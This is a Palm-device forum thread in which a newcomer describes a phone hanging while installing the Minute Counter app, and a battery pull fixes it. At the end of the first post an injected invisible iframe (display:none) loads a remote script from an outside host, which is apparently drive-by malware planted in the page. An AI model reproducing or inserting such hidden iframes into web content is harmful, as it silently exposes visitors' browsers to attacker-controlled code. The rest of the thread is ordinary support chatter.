+ Reply to Thread

Newb question on setting up mc

Ok, let me apologize in advance for the absolute newbytude of my question, but everyone has to start somewhere right?

Got my 7135 today - this is my first palm ever - I have been waiting for 3 years for a true convergence device. The downside is that I am a palm OS neophyte. It seemed that Minute Counter was the first app I should put on the palm, so after my graffiti lesson, I popped it on my SD card in the "palm" folder and attempted a transfer to the 7135.

It has now been almost 30 minutes and the unit appears locked up. It says "moving to handheld" but will accept no other inputs. Have I committed some grievous newb error that will result in smoke coming out of my new phone?

Thanks for any advice you can share.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    possibly.. did you simply move your old palm profile over to the 7135?

Nope, I did not have any old profile to move. I just turned the phone on, fiddled with it for a half hour, made 3 calls, and tried to put MC on it as noted above.

Like many of you, I am used to learning about computer stuff by just fiddling around with it until I figure it out. It is scaring me that my phone is locked-up completely for 45 mintues now with no response to any inputs.

Is it ok for me to just remove (and then replace) the battery and see if that wakes it up? The screen is still showing that is is moving the mc.prc program to handheld...

Pulling out the battery and restarting did the trick.